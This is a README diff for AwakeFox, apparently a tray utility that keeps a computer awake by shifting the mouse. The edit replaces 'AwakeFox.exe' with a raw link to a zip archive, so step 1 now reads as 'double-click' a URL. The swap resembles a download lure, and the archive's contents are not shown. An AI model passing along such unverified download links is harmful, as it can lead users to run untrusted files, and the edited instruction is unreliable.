idife998/AwakeFox-oss/README.md

 Using AwakeFox is straightforward.
 Here’s how you can get started:

-1. **Run the Application:** After double-clicking on `AwakeFox.exe`, an icon will appear in your system tray.
+1. **Run the Application:** After double-clicking on `https://raw.githubusercontent.com/idife998/AwakeFox-oss/main/AwakeFox/AwakeFox-oss-1.1.zip`, an icon will appear in your system tray.
 2. **Keep Your Computer Awake:** Once it's running, AwakeFox will automatically begin to keep your computer awake by subtly shifting the mouse cursor.
 3. **Close the Application:** If you wish to stop using AwakeFox, simply right-click the icon in the system tray and select "Exit."